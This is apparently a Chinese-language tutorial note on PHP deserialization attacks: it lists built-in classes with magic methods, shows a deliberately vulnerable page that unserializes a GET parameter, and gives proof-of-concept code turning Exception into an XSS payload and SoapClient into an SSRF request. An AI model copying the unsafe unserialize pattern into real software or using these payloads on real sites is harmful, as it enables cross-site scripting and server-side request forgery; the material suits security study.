CVE-2016-7124

    绕过__wakeup

    原生类:

    php中的原生类

    1. <?php
    2. $classes = get_declared_classes();
    3. foreach ($classes as $class) {
    4.    $methods = get_class_methods($class);
    5.    foreach ($methods as $method) {
    6.        if (in_array($method, array(
    7.            '__destruct',
    8.            '__toString',
    9.            '__wakeup',
    10.            '__call',
    11.            '__callStatic',
    12.            '__get',
    13.            '__set',
    14.            '__isset',
    15.            '__unset',
    16.            '__invoke',
    17.            '__set_state'
    18.        ))) {
    19.            print $class . '::' . $method . "\n";
    20.        }
    21.    }
    22. }

    测试:

    1. <?php
    2. highlight_file(__file__);
    3. $a = unserialize($_GET['k']);
    4. echo $a;
    5. ?>

    poc:

    1. <?php
    2. $a=new Exception("<script>alert('xiaodi')</script>");
    3. echo urlencode(serialize($a));
    4. ?>

    -输出对象可调用__toString
    -无代码通过原生类Exception

    -Exception使用查询编写利用

    -通过访问触发输出产生XSS漏洞

    SoapClient原生类:

    首先测试下正常情况下的SoapClient类,调用一个不存在的函数,会去调用__call方法。

    SSRF:

    1. <?php
    2. $a = new SoapClient(null,array('uri'=>'http://example.com:5555', 'location'=>'http://example.com:5555/aaa'));
    3. $b = serialize($a);
    4. echo $b;
    5. $c = unserialize($b);
    6. $c->a();